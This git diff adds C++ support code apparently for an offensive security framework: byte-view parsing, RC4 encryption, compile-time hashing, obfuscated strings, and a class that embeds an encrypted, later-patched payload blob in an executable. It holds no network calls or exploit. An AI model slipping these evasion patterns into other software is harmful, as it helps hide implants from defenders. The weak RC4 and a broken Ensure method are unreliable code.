stringToBeSplitted.size(); startIndex = endIndex + delimiter.size()) + { + endIndex = stringToBeSplitted.find(delimiter, startIndex); + + // skip empty tokens when delimiter is repeated. + if (endIndex - startIndex) + splittedString.emplace_back(stringToBeSplitted.substr(startIndex, endIndex - startIndex)); + } + + return splittedString; + } + + /// Proxy to Split + /// + /// @param stringToBeSplitted initial string to be tokenized. + /// @param delimiter to be searched in string. + /// @throws std::runtime_error if delimiter empty or greatter equal to stringToBeSplitted + /// @returns std::vector tokenized string. + std::vector SplitAndCopy(std::string_view stringToBeSplitted, std::string_view delimiter); + + /// Non owning container. + class ByteView : std::basic_string_view + { + public: + /// Privately inherited Type. + using Super = std::basic_string_view; + + /// Type of stored values. + using ValueType = Super::value_type; + + /// Create from ByteVector. + /// @param data. Data from which view will be constructed. + /// @param offset. Offset from first byte of data collection. + /// @return ByteView. View of data. + /// @throw std::out_of range. If offset is greater than data.size(). + ByteView(ByteVector const& data, size_t offset = 0); + + /// Create from ByteVector iterators. + /// @param begin. Iterator to first element of data. + /// @param end. Iterator to past the last element of data. + /// @return ByteView. View of data. + /// @throw std::out_of range. If begin is greater than end. + ByteView(ByteVector::const_iterator begin, ByteVector::const_iterator end); + + /// Create from std::basic_string_view. + /// @param data. Data from which view will be constructed. + /// @return ByteView. View of data. + ByteView(std::basic_string_view data); + + /// Create from ByteArray. + /// @param data. Data from which view will be constructed. + /// @return ByteView. View of data. + template + ByteView(ByteArray const& data) + : Super(data.data(), data.size()) + { + + } + + /// Create from std::string_view. + /// @param data. Data from which view will be constructed. + /// @return ByteView. View of data. + ByteView(std::string_view data); + + /// Allow cast to Privately inherited Type. + operator Super() const noexcept; + + /// Allow cast to ByteVector. + operator ByteVector() const; + + /// Allow cast to std::string(). + operator std::string() const; + + /// Allow cast to std::string_view. + operator std::string_view() const; + + /// @returns ByteVector. Owning container with the read bytes. + /// @param byteCount. How many bytes should be read. + /// @remarks Read is not compatible with Read. + /// Data stored in ByteVector with Write should be accessed with Read + /// @throws std::out_of_range. If byteCount > size(). + ByteVector Read(size_t byteCount); + + /// Read bytes and remove them from ByteView. + /// @remarks Read is not compatible with Read. + /// Data stored in ByteVector with Write should be accessed with Read + /// @returns ByteVector. Owning container with the read bytes. + /// @throws std::out_of_range. If ByteView is too short to hold size of object to return. + template + std::enable_if_t<(std::is_same_v || std::is_same_v || std::is_same_v), T> Read() + { + if (sizeof(uint32_t) > size()) + throw std::out_of_range{ OBF(": Cannot read size from ByteView ") }; + + auto elementCount = *reinterpret_cast(data()); + auto byteCount = elementCount * sizeof(T::value_type); + remove_prefix(sizeof(uint32_t)); + + T retVal; + retVal.resize(elementCount); + std::memcpy(retVal.data(), data(), byteCount); + remove_prefix(byteCount); + return retVal; + } + + /// Read bytes and remove them from ByteView. + /// @returns ByteArray. Owning container with the read bytes. + /// @throws std::out_of_range. If ByteView is too short to hold size of object to return. + template, int> = 0> + std::enable_if_t, T> Read() + { + if (std::tuple_size::value > size()) + throw std::out_of_range{ OBF(": Cannot read data from ByteView") }; + + T retVal; + std::memcpy(retVal.data(), data(), std::tuple_size::value); + remove_prefix(std::tuple_size::value); + return retVal; + } + + /// Read arithmetic type and remove it from ByteView. + /// @tparam T. Type to return; + /// @returns T. Owning container with the read bytes. + /// @throws std::out_of_range. If sizeof(T) > size(). + template + std::enable_if_t::value, T> Read() + { + if (sizeof(T) > size()) + throw std::out_of_range{ OBF(": Size: ") + std::to_string(size()) + OBF(". Cannot read ") + std::to_string(sizeof(T)) + OBF(" bytes.") }; + + auto retVal = *reinterpret_cast(data()); + remove_prefix(sizeof(T)); + return retVal; + } + + /// Read tuple type. + /// @tparam T. Tuple type to return; + /// @returns T. Owning container with the read bytes. + template + std::enable_if_t, T> Read() + { + return TupleGenerator::Generate(*this); + } + + /// Read tuple and remove bytes from ByteView. + /// @tparam T. Parameter pack of types to be stored in tuple. Must consist more then one type. Each of types must be parsable by Reed template for one type. + /// @returns std::tuple. Tuple will store types provided in parameter pack. + /// @throws std::out_of_range. If ByteView is too short to possibly store all provided types. + template 1), int> = 0> + auto Read() + { + return VariadicTupleGenerator::Generate(*this); + } + + /// Template function allowing structured binding to new std::string or std::string_view variables from text stored in ByteView. + /// + /// auto [a,b] = ToStringArray<2>(); + /// @tparam expectedSize number of words that should be returned from function. + /// @tparam copy if true words will be copied to std::string variables. + /// @tparam modifyByteView if true parsed words will be removed from ByteView object. + /// @returns std::array or std::array array of strings. Size of array is known at compile time. + /// @throws std::runtime_error if bytes is empty or when bytes does not consist at least expectedSize numer of space separated strings. + template + std::array, expectedSize> ToStringArray() + { + auto splited = Split(*this, OBF(" ")); + if (splited.size() < expectedSize) + throw std::runtime_error{ OBF("ByteVector does not consist expected number of strings") }; + + using ReturnType = decltype(ToStringArray()); + ReturnType retValue; + for (auto i = 0u; i < expectedSize; ++i) + retValue[i] = splited[i]; + + if constexpr (modifyByteView) + remove_prefix(splited[expectedSize - 1].data() - reinterpret_cast(data()) + splited[expectedSize - 1].size()); + + return retValue; + } + + /// Create a sub-string from this ByteView. + /// @param offset. Position of the first byte. + /// @param count. Requested length + /// @returns ByteView. View of the substring + ByteView SubString(const size_type offset = 0, size_type count = npos) const; + + // Enable methods. + using std::basic_string_view::basic_string_view; + using Super::operator=; + using Super::begin; + using Super::cbegin; + using Super::end; + using Super::cend; + using Super::rbegin; + using Super::crbegin; + using Super::rend; + using Super::crend; + using Super::operator[]; + using Super::at; + using Super::front; + using Super::back; + using Super::data; + using Super::size; + using Super::length; + using Super::max_size; + using Super::empty; + using Super::remove_prefix; + using Super::remove_suffix; + using Super::swap; + using Super::copy; + using Super::compare; + using Super::find; + using Super::rfind; + using Super::find_first_of; + using Super::find_last_of; + using Super::find_first_not_of; + using Super::find_last_not_of; + using Super::npos; + using Super::value_type; + + private: + /// Delegate to class idiom. + /// Function templates cannot be partially specialized. + /// @tparam T. First type from parameter pack. Each recursive call will unfold one type. + /// @tparam Rest. Parameter pack storing rest of provided types. + template + struct VariadicTupleGenerator + { + /// Function responsible for recursively packing data to tuple. + /// @param self. Reference to ByteView object using generate method. + static auto Generate(ByteView& self) + { + auto current = std::make_tuple(self.Read()); + auto rest = VariadicTupleGenerator::Generate(self); + return std::tuple_cat(current, rest); + } + }; + + /// Delegate to class idiom. + /// Function templates cannot be partially specialized. + /// Closure specialization. + /// @tparam T. Type to be extracted from ByteView and stored in tuple. + template + struct VariadicTupleGenerator + { + /// Function responsible for recursively packing data to tuple. + /// @param self. Reference to ByteView object using generate method. + static auto Generate(ByteView& self) + { + return std::make_tuple(self.Read()); + } + }; + + /// Delegate to class idiom. + /// Function templates cannot be partially specialized. + /// @tparam T. Tuple to be extracted. + /// @tparam N. How many elements out of tuple to use. + template > + struct TupleGenerator + { + /// Function responsible for recursively packing data to tuple. + /// @param self. Reference to ByteView object using generate method. + static auto Generate(ByteView& self) + { + auto current = std::make_tuple(self.Read -N, T>>()); + auto rest = TupleGenerator::Generate(self); + return std::tuple_cat(current, rest); + } + }; + + /// Delegate to class idiom. + /// Function templates cannot be partially specialized. + /// Closure specialization, return empty tuple. + /// @tparam T. Tuple to be extracted. + template + struct TupleGenerator + { + /// Function responsible for recursively packing data to tuple. + /// @param self. Reference to ByteView object using generate method. + static auto Generate(ByteView& self) + { + return std::tuple<>{}; + } + }; + }; + + namespace Literals + { + /// Create ByteView with syntax ""_bvec + MWR::ByteView operator "" _bv(const char* data, size_t size); + + /// Create ByteView with syntax L""_bvec + MWR::ByteView operator "" _bv(const wchar_t* data, size_t size); + } + + /// Template function allowing structured binding to new std::string or std::string_view variables from text command stored in ByteView. + /// + /// auto [a,b] = ToStringArray<2>(someByteView); + /// @tparam expectedSize number of words that should be returned from function. + /// @tparam copy if true words will be copied to std::string variables. + /// @param bytes ByteView to parse. Strings should be separated with spaces. + /// @returns std::array or std::array array of strings. Size of array is known at compile time. + /// @throws std::runtime_error if bytes is empty or when bytes does not consist at least expectedSize numer of space separated strings. + template + std::array, expectedSize> ToStringArray(ByteView bytes) + { + return bytes.ToStringArray(); + } +} diff --git a/Src/Common/MWR/CppTools/Encryption.cpp b/Src/Common/MWR/CppTools/Encryption.cpp new file mode 100644 index 0000000..af3c0d0 --- /dev/null +++ b/Src/Common/MWR/CppTools/Encryption.cpp @@ -0,0 +1,76 @@ +#include "StdAfx.h" + +#include "Encryption.h" + +namespace +{ + // Functions in this anonymous namespace are from https://gist.github.com/rverton/a44fc8ca67ab9ec32089 + // The author did not publish the license. + // Updates ware made to avoid access violation. + + /// @Brief size of pseudo random keystream used by RC4. + constexpr auto N = 256u; + + /// @Brief Initialization of pseudo random keystream with key. + /// + /// @param key IN argument. Used to create keystream. + /// @param len IN argument. Size of key in bytes. + /// @param keystream OUT argument. Generated keystream. + void KeySchedulingAlgorithm(const char* key, size_t len, unsigned char* keystream) + { + for (auto i = 0u; i < N; i++) + keystream[i] = static_cast(i); + + for (auto i = 0u, j = 0u; i < N; i++) + { + j = (j + keystream[i] + key[i % len]) % N; + std::swap(keystream[i], keystream[j]); + } + } + + /// @brief Encrypting data with usage of keystream. + /// + /// @param keystream IN/OUT argument. Keystream used for encryption. With each iteration keystream is modified. + /// @param plainText IN argument. Data to encrypt. + /// @param cipherText OUT argument. Calculated from input data and keystream. + /// @param textSize. Determines number of bytes read from plainText, and written to cipherText. + void PseudoRandomGenerationAlgorithm(unsigned char* keystream, const char* plainText, char* cipherText, size_t textSize) + { + for (auto n = 0u, i = 0u, j = 0u; n < textSize; n++) + { + i = (i + 1) % N; + j = (j + keystream[i]) % N; + + std::swap(keystream[i], keystream[j]); + auto rnd = keystream[(keystream[i] + keystream[j]) % N]; + + cipherText[n] = rnd ^ plainText[n]; + } + } + + + /// @brief Implementation of RC4 algorithm. + /// + /// @note RC4 is a symmetric algorithm. Use this function to decipher text previously encrypted with same key. + /// @param key IN argument. Key used to calculate cipherText. + /// @param keySize IN argument. Size of key in bytes. + /// @plainText IN argument. Data to encrypt. + /// @cipherText OUT argument. Encrypted message, result of RC4 algorithm. + /// @param textSize. Determines number of bytes read from plainText, and written to cipherText. + void RC4(const char* key, size_t keySize, const char* plainText, char* cipherText, size_t textSize) + { + unsigned char keystream[N]; + KeySchedulingAlgorithm(key, keySize, keystream); + PseudoRandomGenerationAlgorithm(keystream, plainText, cipherText, textSize); + } +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::Encryption::RC4(ByteView data, ByteView key) +{ + auto transformed = ByteVector{}; + transformed.resize(data.size()); + ::RC4(reinterpret_cast(key.data()), key.size(), reinterpret_cast(data.data()), reinterpret_cast(transformed.data()), transformed.size()); + + return transformed; +} diff --git a/Src/Common/MWR/CppTools/Encryption.h b/Src/Common/MWR/CppTools/Encryption.h new file mode 100644 index 0000000..9c896fb --- /dev/null +++ b/Src/Common/MWR/CppTools/Encryption.h @@ -0,0 +1,17 @@ +#pragma once + +#include "ByteView.h" +#include "ByteVector.h" + +// + +namespace MWR::Encryption +{ + /// @brief Encrypt/Decrypt data using R4. + /// + /// @param data - Data to run RC4 on. + /// @param key - Key used to encrypt data. Recommended size is 32 bytes. For long keys only first 256 bytes are used. + /// + /// @returns ByteVector transformed data. + ByteVector RC4(ByteView data, ByteView key); +} \ No newline at end of file diff --git a/Src/Common/MWR/CppTools/Hash.h b/Src/Common/MWR/CppTools/Hash.h new file mode 100644 index 0000000..296d177 --- /dev/null +++ b/Src/Common/MWR/CppTools/Hash.h @@ -0,0 +1,145 @@ +#pragma once + +namespace MWR +{ + using HashT = std::uint32_t; ///< Type used for hashes. + + /// Hash at compile time. + class Hash + { + public: + /// Hash typename using Crc32 algorithm. + /// @tparam T. Type to hash. T is not addressed directly, but will affect name of resulting method. + /// @returns HashT. Generated hash. + template + static constexpr HashT Crc32Type() + { + // Functions does not use RTTI, but must take name from predefined __FUNCSIG__ macro. + // __FUNCSIG__ will store name of class with additional function signature which is treated as hash salt. + // strlen is not valid template function parameter, using sizeof instead. sizeof will return strlen + 1, because of trailing \0. + return Crc32::Hash(__FUNCSIG__); + } + + /// Hash using Fnv1a algorithm. + /// @tparam T. Type to hash. T is not addressed directly, but will affect name of resulting method. + /// @returns HashT. Generated hash. + template + static constexpr HashT Fnv1aType() + { + return Fnv1a::Hash(__FUNCSIG__); + } + + /// Delegate to class idiom. + /// Function templates cannot be partially specialized. + /// @tparam size. Size of string to hash. + /// @tparam idx. Index of current character. + template + struct Crc32 + { + /// Get Hash for string. + /// @param str. String to be hashed. + /// @param prev. Output of previous recursive call of function. + /// @return HashT. Hashed string. + static constexpr HashT Hash(const char* str, HashT prev = 0xFFFFFFFF) + { + return Crc32::Hash(str, (prev >> 8) ^ s_CrcTable[(prev ^ str[idx]) & 0xFF]); + } + }; + + /// Delegate to class idiom. + /// Function templates cannot be partially specialized. + /// @tparam size. Size of string to hash. + /// @tparam idx. Index of current character. + template + struct Fnv1a + { + /// Get Hash for string. + /// @param str. String to be hashed. + /// @param prev. Output of previous recursive call of function. + /// @return HashT. Hashed string. + static constexpr HashT Hash(const char* str, HashT prev = 2166136261u) + { + return Fnv1a::Hash(str, (prev ^ str[idx]) * 16777619u); + } + }; + + /// Closing recursion specialization. + /// @tparam size. Size of string to hash. + template + struct Crc32 + { + /// Get Hash for string. + /// @param str. String to be hashed. + /// @param prev. Output of previous recursive call of function. + /// @return HashT. Hashed string. + static constexpr HashT Hash(const char* str, HashT prev = 0xFFFFFFFF) + { + return prev ^ 0xFFFFFFFF; + } + }; + + /// Closing recursion specialization. + /// @tparam size. Size of string to hash. + template + struct Fnv1a + { + /// Get Hash for string. + /// @param str. String to be hashed. + /// @param prev. Output of previous recursive call of function. + /// @return HashT. Hashed string. + static constexpr HashT Hash(const char* str, HashT prev = 0) + { + return prev; + } + }; + + private: + /// Table used for CRC32 hash. + static constexpr HashT s_CrcTable[256] = + { + 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, + 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, + 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2, + 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, + 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, + 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, + 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c, + 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, + 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, + 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, + 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106, + 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, + 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, + 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, + 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, + 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, + 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, + 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, + 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, + 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, + 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, + 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, + 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, + 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, + 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, + 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, + 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, + 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, + 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, + 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, + 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28, + 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, + 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, + 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, + 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, + 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, + 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69, + 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, + 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, + 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, + 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, + 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, + 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d + }; + }; +} diff --git a/Src/Common/MWR/CppTools/Payload.h b/Src/Common/MWR/CppTools/Payload.h new file mode 100644 index 0000000..0c3cedf --- /dev/null +++ b/Src/Common/MWR/CppTools/Payload.h @@ -0,0 +1,121 @@ +#pragma once +#include "ByteView.h" +#include "Encryption.h" + +#define MWR_PAYLOAD_GUID "15e3eda3-74c8-43d5-a4a1-e2e039542240" + +namespace MWR +{ + /// Payload type to be modified by external tool. + /// @tparam N. Size of payload. + /// @remarks only one specialization is allowed in the image. + /// Compiler will try to remove payload if it is not used in executable. + template + class Payload + { + public: + /// This friend declaration creates method in MWR namespace. Two specializations will create compilation error. + friend void PreventSpecializationOfMoreThenOnePayloadInProject() {} + + /// Get size of payload (sizeof(PAYLOAD_GUID) + N) + constexpr static size_t RawSize() + { + return sizeof(m_Payload); + } + + /// Get Size of prefix that will be used to find payload in executable. + /// @returns size_t. Size of prefix. + constexpr static size_t PrefixSize() + { + return sizeof(MWR_PAYLOAD_GUID); + } + + /// Get reference to singleton object. + /// @return Payload&. Reference to singleton instance. + static Payload& Instance() + { + static Payload self; + return self; + } + + /// Get access to underlying data. + /// @return ByteView. Underlying data. + ByteView RawData() const + { + return { reinterpret_cast(m_Payload), RawSize()}; + } + + /// Get number of elements stored in payload. + /// @return uint32_t. Number of elements. + uint32_t Size() const + { + static_assert(sizeof(MWR_PAYLOAD_GUID) > sizeof(uint32_t)); + return *reinterpret_cast(m_Payload + sizeof(MWR_PAYLOAD_GUID) - sizeof(uint32_t) - 1); + } + + /// Get encryption key of data stored in payload. + /// @returns ByteView. Encryption key. + ByteView Key() const + { + return { reinterpret_cast(m_Payload), sizeof(MWR_PAYLOAD_GUID) - sizeof(uint32_t) - 1 }; + } + + /// Access elements stored in payload. + /// @param idx. Index of accessed element. + /// @returns ByteVector. Accessed element. + ByteVector operator[](uint32_t idx) const + { + if (idx >= Size()) + throw std::out_of_range{OBF("Out of range access. Size: ") + std::to_string(Size()) + OBF(" Index: ") + std::to_string(idx)}; + + auto bv = ByteView{ reinterpret_cast(m_Payload) + PrefixSize(), RawSize() - PrefixSize() }; + for (uint32_t i = 0; i < Size(); ++i) + { + auto currentSize = bv.Read(); + if (i == idx) + return Encryption::RC4(bv.SubString(0, currentSize), Key()); + + bv.remove_prefix(currentSize); + } + + throw std::logic_error{ OBF("Function should not reach end of the loop.") }; + } + + /// Find all elements for which unaryPredicate evaluates to true. + /// @param begin. First element of range that will be checked with unaryPredicate. Function will return empty container if begin is greater or equal than size. + /// @param end. First element of range that will be checked with unaryPredicate. Function will check only valid elements for end greater than size. Function will return empty container if end is lesser or equal than begin. + /// @param unaryPredicate. Functor responsible for accepting elements in returned container. + /// @returns std::vector. All elements matching conditions. + std::vector FindMatching(uint32_t begin = 0, uint32_t end = Instance().Size(), std::function unaryPredicate = [](ByteView) {return true; }) + { + std::vector ret; + auto bv = ByteView{ reinterpret_cast(m_Payload) + PrefixSize(), RawSize() - PrefixSize() }; + for (uint32_t i = 0; i < std::min(end, Size()); ++i) + { + auto currentSize = bv.Read(); + if (i >= begin) + if (auto current = Encryption::RC4(bv.SubString(0, currentSize), Key()); unaryPredicate(current)) + ret.push_back(std::move(current)); + + bv.remove_prefix(currentSize); + } + + return ret; + } + + private: + /// Private constructor. Use Instance method to get reference to singleton. + Payload() + { + volatile const char* payloadBuffer = m_Payload; + // When m_Payload is used directly this `if` is optimized away (into branchless throw) in Release builds with enabled InlineFunctionExpansion + if (!payloadBuffer[PrefixSize() - 1]) // Ensure that payload was set before use. + throw std::logic_error{ OBF("Payload was declared but never set.") }; + } + + /// Underlying data. + constexpr static char m_Payload[sizeof(MWR_PAYLOAD_GUID) + N] = MWR_PAYLOAD_GUID; + }; +} + +#undef MWR_PAYLOAD_GUID diff --git a/Src/Common/MWR/CppTools/PrecompiledHeader.hpp b/Src/Common/MWR/CppTools/PrecompiledHeader.hpp new file mode 100644 index 0000000..440a462 --- /dev/null +++ b/Src/Common/MWR/CppTools/PrecompiledHeader.hpp @@ -0,0 +1,26 @@ +#pragma once + +// Standard library includes. +#include //< For std::array. +#include //< For std::vector. +#include //< For std::string. +#include //< For std::string_view. +#include //< For std::function. +#include //< For std::filesystem::path. +#include //< For std::mutex. +#include //< For std:find, std:find_if, etc. +#include //< For alternative logical operators tokens. +#include //< For random values. + +#include "Common/ADVobfuscator/MetaString.h" + +#include "ByteArray.h" //< For ByteArray. +#include "ByteVector.h" //< For ByteVector. +#include "ByteView.h" //< For ByteView. +#include "Utils.h" //< For common functions. + + +// Literals. +using namespace std::string_literals; //< For string literals. +using namespace std::string_view_literals; //< For string_view literals. +using namespace MWR::Literals; //< For _b and _bv. diff --git a/Src/Common/MWR/CppTools/SafeSmartPointerContainer.h b/Src/Common/MWR/CppTools/SafeSmartPointerContainer.h new file mode 100644 index 0000000..0245108 --- /dev/null +++ b/Src/Common/MWR/CppTools/SafeSmartPointerContainer.h @@ -0,0 +1,140 @@ +#pragma once + +namespace MWR +{ + /// Container with multi-threaded synchronization. + template + struct SafeSmartPointerContainer + { + /// Enumerates over elements. + /// @param comparator function that returns true to keep iterate or false to stop. + void For(std::function comparator) const + { + std::scoped_lock lock(m_AccessMutex); // Request access to the underlying Container. + for (auto element : m_Container) + if (!comparator(element)) + return; + } + + /// Finds Element using provided comparator. + /// @param comparator function that returns true for requested Element. + /// @return Element if existed, otherwise null. + T Find(std::function comparator) const + { + std::scoped_lock lock(m_AccessMutex); // Request access to the underlying Container. + auto it = std::find_if(m_Container.begin(), m_Container.end(), comparator); // Find specified Element... + return it == std::end(m_Container) ? T{} : *it; // ...and return it (or null if it couldn't be found). + } + + /// Adds a new Element. + /// @tparam Args constructor arguments. + /// @tparam args constructor arguments. + /// @return newly added Element. + template + T Add(Args&& ... args) + { + std::scoped_lock lock(m_AccessMutex); // Request access to the underlying Container. + m_Container.emplace_back(args...); // Add it at the end. + return m_Container.back(); + } + + /// Adds an Element, but throws if Element is already in the container. + /// @tparam Args constructor arguments. + /// @param comparator function that returns true for requested Element. + /// @tparam args constructor arguments. + /// @return newly added Element. + /// @throw std::invalid_argument if Element is already stored. + template + T TryAdd(std::function comparator, Args&& ... args) + { + std::scoped_lock lock(m_AccessMutex); // Request access to the underlying Container. + if (auto it = std::find_if(m_Container.begin(), m_Container.end(), comparator); it != m_Container.end()) // Find element... + throw std::invalid_argument{ OBF("Tried to add an existing Element to the container.") }; // ...and throw. + + m_Container.emplace_back(std::forward(args)...); // Otherwise add it at the end. + return m_Container.back(); + } + + /// Finds provided Element or adds it if not found. + /// @tparam Args constructor arguments. + /// @param comparator function that returns true for requested Element. + /// @tparam args constructor arguments. + /// @param element an element to be added. + template + T Ensure(std::function comparator, Args&& ... args) + { + std::scoped_lock lock(m_AccessMutex); // Request access to the underlying Container. + if (auto it = std::find(m_Container.begin(), m_Container.end(), element); it != m_Container.end()) // Find element... + return *it; // ...and return it. + + m_Container.emplace_back(std::forward(args)...); // Otherwise add it at the end. + return m_Container.back(); + } + + /// Removes an Elements. + /// @param element what to remove. + /// @throw std::invalid_argument on an attempt of removal of a non-existent Element. + void Remove(T const& element) + { + std::scoped_lock lock(m_AccessMutex); // Request access to the underlying Container. + if (auto it = std::find(m_Container.begin(), m_Container.end(), element); it != m_Container.end()) // Find element... + m_Container.erase(it); // ...and remove it. + else + throw std::invalid_argument{ OBF("Attempted to remove a non-existent Element.") }; + } + + /// Removes an Element using provided comparator. + /// @param comparator function that returns true for requested Element. + /// @throw std::invalid_argument on an attempt of removal of a non-existent Element. + void Remove(std::function comparator) + { + std::scoped_lock lock(m_AccessMutex); // Request access to the underlying Container. + if (auto it = std::find_if(m_Container.begin(), m_Container.end(), comparator); it != m_Container.end()) // Find specified Element... + m_Container.erase(it); // ...and remove it. + else + throw std::invalid_argument{ OBF("Attempted to remove a non-existent Element.") }; + } + + /// Same as Remove, but returns the element removed from the container. + /// @param comparator function that returns true for requested Element. + /// @return Copy of the element that was requested to be removed. + /// @throw std::invalid_argument on an attempt of removal of a non-existent Element. + T Retrieve(std::function comparator) + { + std::scoped_lock lock(m_AccessMutex); // Request access to the underlying Container. + if (auto it = std::find_if(m_Container.begin(), m_Container.end(), comparator); it != m_Container.end()) // Find specified Element... + { + auto element = std::move(*it); // ...move it... + m_Container.erase(it); // ...remove... + return std::move(element); // ...and return it. + } + else + throw std::invalid_argument{ OBF("Attempted to remove a non-existent Element.") }; + } + + /// Gets element quantity. + /// @return number of elements in the container. + size_t GetSize() const + { + return m_Container.size(); + } + + /// Checks if the container has any elements. + /// @return true if the container is empty. + bool IsEmpty() const + { + return m_Container.empty(); + } + + /// Clear whole container. + void Clear() + { + std::scoped_lock lock(m_AccessMutex); + m_Container.clear(); + } + + protected: + mutable std::mutex m_AccessMutex; ///< Mutex for synchronization. + std::vector m_Container; ///< Table of all Elements. + }; +} diff --git a/Src/Common/MWR/CppTools/ScopeGuard.h b/Src/Common/MWR/CppTools/ScopeGuard.h new file mode 100644 index 0000000..a087af6 --- /dev/null +++ b/Src/Common/MWR/CppTools/ScopeGuard.h @@ -0,0 +1,53 @@ +#pragma once + +namespace MWR +{ + /// ScopeGuard helps you automate resource deallocation in a clear, robust way. Guarantees to call destructors in reverse order.
+ /// Usage: auto p = new int; SCOPE_GUARD { delete p; }; ///< delete p; will be executed automatically on scope leave.
+ /// Based on https://www.codeproject.com/Articles/124130/Simple-Look-Scope-Guard-for-Visual-C. + /// @warning Never use this class directly. Always use the SCOPE_GUARD macro. + struct ScopeGuard + { + /// Class design. + typedef ScopeGuard Type; ///< Can't use automatic LIGHT_CLASS_FILLER because of deleted constructors and operators. + + /// Cleanup function signature. + typedef std::function CleanupFunction_t; + + /// The only valid to call manual constructor. + /// @param function cleanup function to call on scope leave. + Type(const CleanupFunction_t& function) : m_CleanupFunction(function) { } + + /// Deleted l-value constructor, to reject l-value references. + Type(CleanupFunction_t&) = delete; + + /// R-value constructor, to accept r-value references. + Type(CleanupFunction_t&& function) : m_CleanupFunction(function) { } + + /// Destructor. + ~ScopeGuard() { m_CleanupFunction(); } + + /// Operators. + const Type& operator=(const Type&) = delete; ///< No copying between ScopeGuards is allowed. + + /// Conversion operators. + Type(const Type&) = delete; ///< Same as above - no copying between ScopeGuard objects. + + /// Heap operators are rejected. + void *operator new(size_t) = delete; + void *operator new[](size_t) = delete; + void operator delete(void *) = delete; + void operator delete[](void *) = delete; + + private: + const CleanupFunction_t m_CleanupFunction; ///< Pointer to cleanup function. This function will be called on ScopeGuard destruction i.e. on scope leave. + }; + + // Macros. +# define SCOPE_GUARD_CAT_EXPANDED(x, y) x##y +# define SCOPE_GUARD_CAT(x, y) SCOPE_GUARD_CAT_EXPANDED(x, y) + + /// SCOPE_GUARD macro definition. You should always use this macro instead of direct manipulations on ScopeGuard structure and it's objects.
